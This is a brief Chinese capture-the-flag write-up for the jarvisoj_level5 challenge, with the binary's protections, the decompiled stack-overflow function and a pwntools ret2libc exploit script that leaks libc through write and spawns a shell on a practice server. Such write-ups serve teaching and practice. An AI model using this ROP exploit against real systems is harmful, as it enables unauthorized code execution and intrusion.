jarvisoj_level5

本文主要是介绍jarvisoj_level5，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

jarvisoj_level5

Arch:     amd64-64-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x3fe000)

64位，只开了NX

ssize_t vulnerable_function()
{char buf[128]; // [rsp+0h] [rbp-80h] BYREFwrite(1, "Input:\n", 7uLL);return read(0, buf, 0x200uLL);
}

程序很简单，栈溢出

思路

ret2libc，打write，注意寄存器就行

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",26804,"./pwn",10)
context(os='linux', arch='amd64',log_level='debug')
libc=ELF('libc-2.23.so')rdi=0x00000000004006b3
rsi_r15=0x00000000004006b1
pl=cyclic(0x88)+flat(rdi,1,rsi_r15,elf.got['write'],0,elf.sym['write'],0x40061A)
sa(b'put',pl)
leak=get_addr_u64()-libc.sym['write']
li(leak)
sys=system(leak)
sh=shell(leak)
pl=cyclic(0x88)+flat(rdi,sh,sys)
s(pl)ia(c)

这篇关于jarvisoj_level5的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---